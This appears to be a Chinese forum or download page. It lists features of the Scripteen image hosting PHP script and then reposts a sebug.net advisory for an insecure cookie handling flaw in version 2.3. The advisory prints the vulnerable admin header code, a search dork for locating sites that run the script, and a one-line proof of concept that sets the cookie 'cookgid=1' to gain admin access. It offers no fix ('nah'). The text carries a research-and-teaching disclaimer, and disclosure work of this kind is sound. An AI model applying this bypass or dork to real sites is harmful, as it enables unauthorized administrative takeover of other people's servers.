网声的图片上载站演示-Scripteen image hosting script v1.4.6 PHP script
http://pictures.wszy.net/Free Image Hosting is a great free photo hosting for your daily online surfing. You will have several types of links to the photo that you have stored with us including a direct link which makes it suitable to publish the photo anywhere while the links can be also used in websites, blogs and any content management system. You don't even have to register to be able to upload but registration gives you the benifit of tracking your photos and know how many views did it get and where those views are coming from and the best thing is that it's all FREE!
Maximum File Size: 2 MB
Allowed File Types: gif,jpg,jpeg,png
;P;P http://www.vivaprograms.com/8pic/Scripteen%20Image%20Hosting%20Script.jpg
Front End Features. Nice and user friendly design.
High CTR ad placements.
Dynamic navigation bar with 3 link groups for guests/members/admin.
Support for gif,jpg,jpeg,png,bmp with thumbnails by default.
Ajax Multi file upload.
Url upload (uploading from links).
Auto thumbnail generation.
Enhanced Photo gallery.
Users can report images as adult.
Auto generation of different linking types.
Send links to email.
Member registration system with email confirmation.
Advanced user control panel.
Members can see all photos and their links from user cp.
Members can see where their photos are posted.
Members can see how much 带宽 their photos are using.
Members can delete photos from user cp.
Admin Features.
Welcome page with site stats.
Advanced configuration page to set detailed options for users/guests like file types/max file size / max 带宽 and more.
Ability to add multiple servers to distribute site disk and 带宽 usage.
Admin can view/search/edit/ban/delete users.
Admin can view/delete images.
Image cleaner to delete unused images.
Enable / disable URL upload for guests.
Enable / disable URL upload for members.
Ad manager to control advertising slots all over the site.
IP blocker to block users violating terms from uploading more photos.
http://go.rapiddigger.com/rapidshare/scripteen-free-image-hosting-script-v1-4-6-zip-28881786/ Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln
SSV ID:14772
发布时间:2009-07-24
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
|| || | ||
o_,_7 _||. _o_7 _|| q_|_||o_\\\_,
(:/ (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
__/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
/QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
|QQQQ/ ByQabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqahotmail.fr /QQQQ|
\QQQQ\ __/QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/`\QQQQ\
``````````````````` `````
=Vuln: Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
=INFO: http://www.scripteen.com/
=BUY: ---
=Download: http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
=DORK: DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"
____________
_-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````
none
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in ".\admin\header.php"
$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
if (!$userid || empty($userid) || $userid==""){
$userid = $_COOKIE['cookid'];
$usergid = $_COOKIE['cookgid'];
}
// this is the scripts authentication code, pasted in all admin files.. fail.
if($usergid!="1")
{
header("Location: logout.php"); exit;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set:
Cookie: cookgid=1
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
nah
---------------------------------------===--------------------------------------
______________________________________________________________________________
/ \
| ----------------------------------------------------------------------|
\______________________________________________________________________________/
\ No More Private /
`````````````````
Salamz to All Muslim Hackers.
# sebug.net
// sebug.net
页:
[1]